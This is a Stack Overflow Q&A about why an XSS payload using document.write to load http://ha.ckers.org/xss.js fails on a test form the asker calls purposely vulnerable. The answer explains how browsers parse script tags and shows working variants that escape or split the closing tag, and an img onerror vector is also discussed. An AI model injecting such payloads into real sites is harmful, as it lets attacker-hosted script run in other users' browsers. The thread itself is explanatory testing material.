0

How do i load an external .js script using this syntax?:

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers.org/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers.org/xss.js"><\/script>')>

Improve this question
1
  • You have to escape the </script> tag: <\/script> - otherwise the compiler will end the JS with that tag and not with the right one Commented Jul 3, 2013 at 22:16

1 Answer 1

Reset to default
1

What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers.org/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

<script>document.write('<script src=http://ha.ckers.org/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

<script>document.write('<script src=http://ha.ckers.org/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers.org/xss.js></scr' + 'ipt>')</script>
Improve this answer
Sign up to request clarification or add additional context in comments.

8 Comments

hmm strange it only works with <script> tags, i was wondering, when the xss is <img src=x onerror=document.write('<script src="ha.ckers.org/xss.js"><\/script>')> it doesn't work, why?
@user2536979: I'm not quite sure what you mean by "doesn't work," but remember that the text of HTML attributes is HTML. And if you don't enclose the value of an attribute in quotes, the attribute value ends at the first space (in your case, after <script).
You have to wrap the inline code, added with HTML tags events, inside the quotes. You will need to escape the string in the right way, or it won't work! (But I'm not sure it would work anyway)
@T.J.Crowder The xss works when i have it surrounded by <script> tags, however, when i use the vector <img src=x onerror=javascriptcodegoeshere> it doesn't work. "<img src=x onerror=document.write('<script src=ha.ckers.org/xss.js></script>')>" doesn't work but "<script>document.write('<script src=ha.ckers.org/xss.js><\/script>')</script>" works.
@user2536979: See above. If you ensure the attribute is properly encoded, the script will run. You probably don't want document.write, though, as it completely replaces the page at the point onerror would load it. But fundamentally: Why all these games?
|

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.